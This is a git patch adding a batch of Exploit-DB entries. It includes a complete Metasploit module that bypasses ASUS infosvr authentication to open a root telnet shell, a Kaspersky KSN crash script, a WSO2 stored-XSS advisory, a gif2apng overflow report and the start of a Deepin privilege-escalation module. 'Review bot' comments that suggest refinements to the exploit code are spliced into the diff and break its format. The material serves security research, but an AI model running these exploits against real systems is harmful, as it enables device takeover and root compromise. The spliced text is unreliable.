From c249d94cb794810d2899571f96439e0d2d6452e3 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 25 Apr 2018 05:01:39 +0000 Subject: [PATCH] DB: 2018-04-25 28 changes to exploits/shellcodes gif2apng 1.9 - '.gif' Stack Buffer Overflow VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC) Kaspersky KSN for Linux 5.2 - Memory Corruption Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service Adobe Flash - Overflow when Playing Sound Adobe Flash - Overflow in Slab Rendering Adobe Flash - Info Leak in Image Inflation Adobe Flash - Out-of-Bounds Write in blur Filtering Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion R 3.4.4 - Local Buffer Overflow Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH) lastore-daemon D-Bus - Privilege Escalation (Metasploit) Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) ASUS infosvr - Auth Bypass Command Execution (Metasploit) UK Cookie Consent - Persistent Cross-Site Scripting WUZHI CMS 4.1.0 - Cross-Site Request Forgery Open-AudIT 2.1 - CSV Macro Injection Monstra CMS 3.0.4 - Arbitrary Folder Deletion Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes) Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes) Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes) Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes) --- exploits/hardware/remote/44524.rb | 141 ++++++++++++++++ exploits/java/webapps/44531.txt | 131 +++++++++++++++ exploits/linux/dos/44519.txt | 91 +++++++++++ exploits/linux/dos/44521.py | 254 +++++++++++++++++++++++++++++ 
exploits/linux/local/44523.rb | 172 +++++++++++++++++++ exploits/multiple/dos/44526.txt | 7 + exploits/multiple/dos/44527.txt | 7 + exploits/multiple/dos/44528.txt | 7 + exploits/multiple/dos/44529.txt | 7 + exploits/multiple/dos/44530.js | 80 +++++++++ exploits/php/webapps/44503.txt | 51 ++++++ exploits/php/webapps/44504.txt | 23 +++ exploits/php/webapps/44512.txt | 44 +++++ exploits/php/webapps/44513.py | 156 ++++++++++++++++++ exploits/php/webapps/44515.py | 138 ++++++++++++++++ exploits/php/webapps/44520.html | 42 +++++ exploits/windows/dos/44514.py | 62 +++++++ exploits/windows/dos/44525.py | 156 ++++++++++++++++++ exploits/windows/local/44516.py | 83 ++++++++++ exploits/windows/local/44518.py | 55 +++++++ exploits/windows/remote/44522.py | 192 ++++++++++++++++++++++ exploits/windows/webapps/44511.txt | 50 ++++++ files_exploits.csv | 22 +++ files_shellcodes.csv | 6 + shellcodes/linux_x86/44505.c | 81 +++++++++ shellcodes/linux_x86/44507.c | 71 ++++++++ shellcodes/linux_x86/44508.c | 68 ++++++++ shellcodes/linux_x86/44509.c | 47 ++++++ shellcodes/linux_x86/44510.c | 60 +++++++ shellcodes/linux_x86/44517.c | 54 ++++++ 30 files changed, 2358 insertions(+) create mode 100755 exploits/hardware/remote/44524.rb create mode 100644 exploits/java/webapps/44531.txt create mode 100644 exploits/linux/dos/44519.txt create mode 100755 exploits/linux/dos/44521.py create mode 100755 exploits/linux/local/44523.rb create mode 100644 exploits/multiple/dos/44526.txt create mode 100644 exploits/multiple/dos/44527.txt create mode 100644 exploits/multiple/dos/44528.txt create mode 100644 exploits/multiple/dos/44529.txt create mode 100644 exploits/multiple/dos/44530.js create mode 100644 exploits/php/webapps/44503.txt create mode 100644 exploits/php/webapps/44504.txt create mode 100644 exploits/php/webapps/44512.txt create mode 100755 exploits/php/webapps/44513.py create mode 100755 exploits/php/webapps/44515.py create mode 100644 exploits/php/webapps/44520.html create mode 100755 
exploits/windows/dos/44514.py create mode 100755 exploits/windows/dos/44525.py create mode 100755 exploits/windows/local/44516.py create mode 100755 exploits/windows/local/44518.py create mode 100755 exploits/windows/remote/44522.py create mode 100644 exploits/windows/webapps/44511.txt create mode 100644 shellcodes/linux_x86/44505.c create mode 100644 shellcodes/linux_x86/44507.c create mode 100644 shellcodes/linux_x86/44508.c create mode 100644 shellcodes/linux_x86/44509.c create mode 100644 shellcodes/linux_x86/44510.c create mode 100644 shellcodes/linux_x86/44517.c diff --git a/exploits/hardware/remote/44524.rb b/exploits/hardware/remote/44524.rb new file mode 100755 index 000000000..eb6c9c9b6 --- /dev/null +++ b/exploits/hardware/remote/44524.rb 
@@ -0,0 +1,141 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ASUS infosvr Auth Bypass Command Execution', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in the + infosvr service running on UDP port 9999 on various ASUS routers to + execute arbitrary commands as root. + + This module launches the BusyBox Telnet daemon on the port specified + in the TelnetPort option to gain an interactive remote shell. + + This module was tested successfully on an ASUS RT-N12E with firmware + version 2.0.0.35. + + Numerous ASUS models are reportedly affected, but untested. + }, + 'Author' => + [ + 'Friedrich Postelstorfer', # Initial public disclosure and Python exploit + 'jduck', # Independent discovery and C exploit + 'Brendan Coles ' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'References' => + [ + ['CVE', '2014-9583'], + ['EDB', '35688'], + ['URL', 'https://github.com/jduck/asus-cmd'] + ], + 'DisclosureDate' => 'Jan 4 2015', + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0)) + register_options [ + Opt::RPORT(9999), + OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]), + OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]), + OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25]) + ] + register_advanced_options [ + # If the session is killed (CTRL+C) rather than exiting cleanly, + # the telnet port remains open, but is unresponsive, and prevents + # re-exploitation until 
the device is rebooted. + OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit']) + ] + end + + def telnet_timeout + (datastore['TelnetTimeout'] || 10) + end + + def telnet_port + datastore['TelnetPort'] + end + + def request(cmd) + pkt = '' + # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO + pkt << "\x0C" + # PacketType [byte] ; NET_PACKET_TYPE_CMD + pkt << "\x15" + # OpCode [word] ; NET_CMD_ID_MANU_CMD + pkt << "\x33\x00" + # Info [dword] ; Comment: "Or Transaction ID" + pkt << Rex::Text.rand_text_alphanumeric(4) + # MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp + pkt << Rex::Text.rand_text_alphanumeric(6) + # Password [byte[32]] ; Not checked at all + pkt << "\x00" * 32 + # Command Length + \x00 + Command padded to 512 bytes + pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00") + end + + def exploit + connect_udp + print_status "#{rhost} - Starting telnetd on port #{telnet_port}..." + udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}" + disconnect_udp + + vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..." + Rex.sleep 3 + + vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..." + + sock = Rex::Socket.create_tcp 'PeerHost' => rhost, + 'PeerPort' => telnet_port, + 'Context' => { 'Msf' => framework, 'MsfExploit' => self }, + 'Timeout' => telnet_timeout + + if sock.nil? + fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}" + end + + vprint_status "#{rhost} - Trying to establish a telnet session..." + + prompt = negotiate_telnet sock + if prompt.nil? + sock.close + fail_with Failure::Unknown, 'Unable to establish a telnet session' + end + + print_good "#{rhost} - Telnet session successfully established..." 
+ + handler sock + end + + def negotiate_telnet(sock) + prompt = '#' + Timeout.timeout(datastore['TelnetBannerTimeout']) do + while true + data = sock.get_once(-1, telnet_timeout) + if !data or data.length == 0 + return nil + elsif data.include? prompt + return true + end + end + end + rescue ::Timeout::Error + return nil + end +end \ No newline at end of file diff --git a/exploits/java/webapps/44531.txt b/exploits/java/webapps/44531.txt new file mode 100644 index 000000000..5b72254ae --- /dev/null +++ b/exploits/java/webapps/44531.txt 
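Review bot: The module Description does not say what is left on the device afterwards: `exploit` sends `telnetd -l /bin/sh -p #{telnet_port}` and nothing in the module stops that daemon, so a root shell listener presumably stays bound on TelnetPort once the session closes; the comment above `CommandShellCleanupCommand` only covers the unclean-exit case. A sentence in the Description such as `This module leaves a telnetd listener running on TelnetPort; it is not removed when the session ends.` would make the footprint explicit for anyone reviewing the target afterwards. In `request`, `[cmd.length].pack('C')` wraps silently for commands longer than 255 bytes and yields a malformed packet; `raise ArgumentError, 'command too long' if cmd.length > 255` would make that failure explicit.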
@@ -0,0 +1,131 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180423-0 > +======================================================================= + title: Multiple Stored XSS Vulnerabilities + product: WSO2 Carbon, WSO2 Dashboard Server + vulnerable version: WSO2 Identity Server 5.3.0 + fixed version: WSO2 Identity Server 5.5.0 + CVE number: CVE-2018-8716 + impact: high + homepage: https://wso2.com/products/dashboard + found: 2017-12-13 + by: W. Schober (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"WSO2 Carbon redefines middleware by providing an integrated and componentized +middleware platform that adapts to the specific needs of any enterprise +IT project - on premise or in the cloud. +100% open source and standards-based, WSO2 Carbon enables developers to rapidly +orchestrate business processes, compose applications and develop services using +WSO2 Developer Studio and a broad range of business and technical services that +integrate with legacy, packaged and SaaS applications. +The lean, complete, OSGi-based platform includes more than 175 components – OSGi +bundles or Carbon features. The WSO2 Carbon core framework functions as +“Eclipse for servers” and includes common capabilities shared by all WSO2 +products, such as built-in registry, user management, transports, security, +logging, clustering, caching and throttling services, co-ordination, and a +GUI framework." + +Source: https://wso2.com/products/carbon/ + +"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to +rapidly create visually appealing and engaging web components such as +dashboards, and gadgets, and unlocking data for business intelligence and +monitoring. 
With the host of capabilities that Dashboard Server provides +out-of-the-box, going from data to screen has never been easier." + +Source: https://wso2.com/products/dashboard-server/ + + +Business recommendation: +------------------------ +SEC Consult recommends to perform a thorough security review conducted by +security professionals to identify and resolve all security issues. + + +Vulnerability overview/description: +----------------------------------- +1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716) +The dashboard is used by the end-users to manage their accounts, change passwords, +alter their profiles, or change certain settings. An attacker is able to inject +arbitrary JavaScript payloads into various textboxes (username, home address, +lastname, firstname, etc). + +The payloads are permanently stored in the dashboard and triggered every time the +dashboard is visited. The payload is also potentially triggered in the carbon +part of WSO2, which means that an attacker would be able to inject payloads +from the front-end application into a middleware application, which is not +accessible from the internet and attack administrators. + +2) Stored Cross-Site Scripting in WSO2 Carbon +The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker +host URL an arbitrary JavaScript payload can be injected and permanently stored +in the web application. + + +Proof of concept: +----------------- +1) Stored Cross-Site Scripting in WS02 Dashboard +The following input fields are vulnerable and JavaScript payloads can be directly +injected: +- Firstname +- Lastname +- Username +- Address + +It is suspected, that all user inputs are returned unfiltered in all server responses. + +2) Stored Cross-Site Scripting in WSO2 Carbon +To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set +the URL to the following payload: "> + +Everytime the carbon middleware application is accessed, the payload is triggered. 
+ + +Vulnerable / tested versions: +----------------------------- +The following version has been tested which was the most recent version +at the time of discovery: + +* WSO2IS 5.3.0 + + +Vendor contact timeline: +------------------------ +2018-01-25: Contacting vendor through security@wso2.com +2018-02-08: Asking for status update. Vendor responds, that they are + still investigating the issue. +2018-02-21: Vendor responds with release date and further details + concerning the nature of the vulnerabilities. The XSS in the + Carbon component was a duplicate and should be already fixed. + Concerning the XSS in the dashboard a fix is implemented + and will be rolled out with the release of WSO2 Identity + Server 5.5.0. +2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard. +2018-03-15: Mitre assigned CVE-2018-8716. +2018-03-26: Vendor informed us, that the final release of the updated + software will be on 5th of April. +2018-04-23: Public Release + + +Solution: +--------- +Update WSO2 Identity Server to 5.5.0 + + +Workaround: +----------- +No workaround available + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \ No newline at end of file diff --git a/exploits/linux/dos/44519.txt b/exploits/linux/dos/44519.txt new file mode 100644 index 000000000..8cbff039e --- /dev/null +++ b/exploits/linux/dos/44519.txt 
@@ -0,0 +1,91 @@ +# Exploit Title: gif2apng 1.9 '.gif' Stack-Buffer Overflow +# Date: 20 April 2018 +# Exploit Author: Hamm3r.py +# Vendor Homepage: http://gif2apng.sourceforge.net/ +# Version: 1.9 +# Tested on: Ubuntu 16.04 +# CVE : + +gif2apng is vulnerable to a stack based buffer overflow when a malformed +gif is supplied. Following is the stack trace: + +$ ./gif2apng fuzz.gif + +gif2apng 1.9 using 7ZIP with 15 iterations + +Reading 'fuzz.gif'... +================================================================= +==3674==ERROR: AddressSanitizer: stack-buffer-overflow on address +0x7fffb183bcf1 at pc 0x0000004ebdce bp 0x7fffb1837a90 sp +0x7fffb1837a88 +WRITE of size 1 at 0x7fffb183bcf1 thread T0 +#0 0x4ebdcd (/home/shyam/FUZZ/gif2apng+0x4ebdcd) +#1 0x4ee926 (/home/shyam/FUZZ/gif2apng+0x4ee926) +#2 0x7f4e5642282f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) +#3 0x4199a8 (/home/shyam/FUZZ/gif2apng+0x4199a8) + +Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame +#0 0x4eb23f (/home/shyam/FUZZ/gif2apng+0x4eb23f) + +This frame has 6 object(s): +[32, 36) 'size' +[48, 8242) 'prefix' +[8512, 12609) 'suffix' +[12880, 16977) 'str' <== Memory access at offset 16977 overflows +this variable +[17248, 18272) 'data' +[18400, 18401) 'mincodesize' +HINT: this may be a false positive if your program uses some custom +stack unwind mechanism or swapcontext +(longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow +(/home/shyam/FUZZ/gif2apng+0x4ebdcd) +Shadow bytes around the buggy address: +0x1000762ff740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x1000762ff790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]f2 +0x1000762ff7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 
f2 f2 f2 f2 f2 f2 +0x1000762ff7b0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 +0x1000762ff7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +0x1000762ff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): +Addressable: 00 +Partially addressable: 01 02 03 04 05 06 07 +Heap left redzone: fa +Heap right redzone: fb +Freed heap region: fd +Stack left redzone: f1 +Stack mid redzone: f2 +Stack right redzone: f3 +Stack partial redzone: f4 +Stack after return: f5 +Stack use after scope: f8 +Global redzone: f9 +Global init order: f6 +Poisoned by user: f7 +Container overflow: fc +Array cookie: ac +Intra object redzone: bb +ASan internal: fe +Left alloca redzone: ca +Right alloca redzone: cb +==3674==ABORTING + + +Version of software in use: + +./gif2apng + +gif2apng 1.9 + +#This issue is identified by Hamm3r.py, a general purpose fuzzer! +https://github.com/0xshyam/hamm3r.py + + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44519.zip \ No newline at end of file diff --git a/exploits/linux/dos/44521.py b/exploits/linux/dos/44521.py new file mode 100755 index 000000000..abb6200d7 --- /dev/null +++ b/exploits/linux/dos/44521.py 
@@ -0,0 +1,254 @@ +''' +# Exploit Author: Juan Sacco - http://exploitpack.com +# +# Tested on: Kali i686 GNU/Linux +# CVE: NotYet +# +# Exploit description: +# Kaspersky KSN v5.2 is prone to a remote memory corruption because it +fails to properly filter the input on the remote subscribers, this +leads to heap segments overwrite +# and it leads to remote code execution. +# +# +# Program description: +# Kaspersky KSN for Linux enables cloud-assisted, multi-layered +security for servers and workstations running the Linux operating +system. It delivers reliable protection with minimal impact on +# performance. +# Product homepage: http://kaspersky.com +# +# Example usage: python kaspersky.py 192.168.1.1 6349 +# +# [!] Valgrind output: +# +# =3314== Invalid write of size 4 +# ==3314== at 0x24FA74: +RespObject::SetSimpleString(std::__cxx11::basic_string, std::allocator > const&) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x241814: RequestParser::Parse(unsigned char*, +unsigned long, std::function) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x23B740: +Session > +>::HandleRead(boost::system::error_code const&, unsigned long) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x22FF56: +boost::asio::detail::reactive_socket_recv_op > >, +boost::system::error_code const&, unsigned long>, +boost::_bi::list3 > >*>, +boost::arg<1> (*)(), boost::arg<2> (*)()> > +>::do_complete(boost::asio::detail::task_io_service*, +boost::asio::detail::task_io_service_operation*, +boost::system::error_code const&, unsigned long) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x23647C: +boost::asio::detail::task_io_service::run(boost::system::error_code&) +(in /usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server) +# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd +# ==3314== +# ==3314== +# ==3314== Process terminating with default action of signal 11 +(SIGSEGV): dumping core +# ==3314== 
Access not within mapped region at address 0x0 +# ==3314== at 0x24FA74: +RespObject::SetSimpleString(std::__cxx11::basic_string, std::allocator > const&) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x241814: RequestParser::Parse(unsigned char*, +unsigned long, std::function) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x23B740: +Session > +>::HandleRead(boost::system::error_code const&, unsigned long) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x22FF56: +boost::asio::detail::reactive_socket_recv_op > >, +boost::system::error_code const&, unsigned long>, +boost::_bi::list3 > >*>, +boost::arg<1> (*)(), boost::arg<2> (*)()> > +>::do_complete(boost::asio::detail::task_io_service*, +boost::asio::detail::task_io_service_operation*, +boost::system::error_code const&, unsigned long) (in +/usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x23647C: +boost::asio::detail::task_io_service::run(boost::system::error_code&) +(in /usr/local/ksn/bin/rocksdb-server) +# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server) +# ==3314== If you believe this happened as a result of a stack +# ==3314== overflow in your program's main thread (unlikely but +# ==3314== possible), you can try to increase the size of the +# ==3314== main thread stack using the --main-stacksize= flag. +# ==3314== The main thread stack size used in this run was 8388608. +# ==3314== +# ==3314== HEAP SUMMARY: +# ==3314== in use at exit: 769,426 bytes in 7,522 blocks +# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534 +bytes allocated +# ==3314== +# ==3314== LEAK SUMMARY: +# ==3314== definitely lost: 8 bytes in 1 blocks +# ==3314== indirectly lost: 0 bytes in 0 blocks +# ==3314== possibly lost: 5,328 bytes in 9 blocks +# ==3314== still reachable: 764,090 bytes in 7,512 blocks +# ==3314== of which reachable via heuristic: +# ==3314== newarray : 8,264 bytes in 4 blocks +# ==3314== suppressed: 0 bytes in 0 blocks +# +# [!] 
Debugger output: +# +# [----------------------------------registers-----------------------------------] +# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 --> +0x7f7ee1d4f090 --> 0x7f7ee1894760 +(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13) +# RBX: 0x0 +# RCX: 0x7f7ee2913000 --> 0x0 +# RDX: 0xffffffffffdf6bf0 +# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 --> +0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760 +(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13) +# RDI: 0x0 +# RBP: 0x7f7ee28f5338 --> 0x81 +# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5 +# RIP: 0x7f7ee18b3a74 +(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>: + mov DWORD PTR [rdi],0x1) +# R8 : 0x0 +# R9 : 0x7 +# R10: 0x2 +# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800 +# R12: 0x29b +# R13: 0x0 +# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 --> +0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760 +(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13) +# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b +# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT +direction overflow) +# [-------------------------------------code-------------------------------------] +# 0x7f7ee18b3a6e: xchg ax,ax +# 0x7f7ee18b3a70 +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>: + push rbx +# 0x7f7ee18b3a71 +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>: + mov rbx,rdi +# => 0x7f7ee18b3a74 +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>: + mov DWORD PTR [rdi],0x1 +# 0x7f7ee18b3a7a +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>: +lea rdi,[rdi+0x10] +# 0x7f7ee18b3a7e +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>: +call 0x7f7ee184a8a0 
+<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt> +# 0x7f7ee18b3a83 +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>: +mov BYTE PTR [rbx+0x4],0x0 +# 0x7f7ee18b3a87 +<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>: +pop rbx +# [------------------------------------stack-------------------------------------] +# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5 +# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815 +(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>: + mov rdi,QWORD PTR [rsp+0x110]) +# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd +# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045 +# 0032| 0x7ffe127425e0 --> 0x361 +# 0040| 0x7ffe127425e8 --> 0x0 +# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 --> +0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...) +# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0 +# [------------------------------------------------------------------------------] +# Legend: code, data, rodata, value +# Stopped reason: SIGSEGV +# 0x00007f7ee18b3a74 in +RespObject::SetSimpleString(std::__cxx11::basic_string, std::allocator > const&) () +# gdb-peda$ where +# #0 0x00007f7ee18b3a74 in +RespObject::SetSimpleString(std::__cxx11::basic_string, std::allocator > const&) () +# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*, +unsigned long, std::function) () +# #2 0x00007f7ee189f741 in +Session > +>::HandleRead(boost::system::error_code const&, unsigned long +''' + +import binascii +import sys +import socket +import time + +def rocksDB(target,port): + try: + while 1: + # Open socket + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # Set reuse ON + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + # Bind port + s.connect((target, port)) + print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + +"Connected to:"), target, port + 
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + +"Establishing connection.. ") + packet = +binascii.unhexlify(b'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') + # Log the packet in hexa and timestamp + fileLog = target + ".log" + logPacket = open("exploit.log", "w+") + logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - +Writing to socket: " + binascii.hexlify(bytes(packet))+"\n") + logPacket.close() + + # Write bytecodes to socket + print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing +to socket: ") + s.send(bytes(packet)) + # Packet sent: + print(bytes(packet)) + try: + data = s.recv(4096) + print("[" + time.strftime('%a %H:%M:%S') + "]" + " - +"+ "Data received: '{msg}'".format(msg=data)) + except socket.error, e: + print '[!] Sorry, No data available' + continue + s.close() + except socket.error as error: + print error + print "Sorry, something went wrong!" + +def howtouse(): + print "Usage: kaspersky.py hostname port" + print "[*] Mandatory arguments:" + print "[-] Specify a hostname / port" + sys.exit(-1) + +if __name__ == "__main__": + try: + # Set target + target = sys.argv[1] + port = int(sys.argv[2]) + + print "[*] Kaspersky KSN 0-Day by Juan Sacco " + rocksDB(target, port) + except IndexError: + howtouse() \ No newline at end of file diff --git a/exploits/linux/local/44523.rb b/exploits/linux/local/44523.rb new file mode 100755 index 000000000..c33ee96ad --- /dev/null +++ b/exploits/linux/local/44523.rb 
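Review bot: The file mixes Python 2-only syntax (`except socket.error, e:` in `rocksDB`, bare `print` statements in `howtouse` and the `__main__` block) with `print(...)` calls that read as Python 3, so the header comment should state the interpreter, e.g. `# Requires: Python 2.7`. In `rocksDB` the local `fileLog` is assigned but never used, and `open("exploit.log", "w+")` is executed on every loop iteration, so each pass truncates the previous record and the log only ever holds the last packet; if the log is meant to keep a record, open `fileLog` once before the loop in append mode. `binascii.hexlify(bytes(packet))` concatenated to a `str` also only works under Python 2, which is one more reason to pin the version in the header.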
@@ -0,0 +1,172 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'lastore-daemon D-Bus Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Deepin Linux systems + by using lastore-daemon to install a package. + + The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any + user in the sudo group to install arbitrary system packages without + providing a password, resulting in code execution as root. By default, + the first user created on the system is a member of the sudo group. + + This module has been tested successfully with lastore-daemon version + 0.9.53-1 on Deepin Linux 15.5 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + "King's Way", # Discovery and exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Feb 2 2016', + 'References' => + [ + [ 'EDB', '39433' ], + [ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ], + ], + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'DefaultTarget' => 0)) + register_options([ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def mkdir(path) + vprint_status "Creating '#{path}' directory" + cmd_exec "mkdir -p #{path}" + register_dir_for_cleanup path + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." 
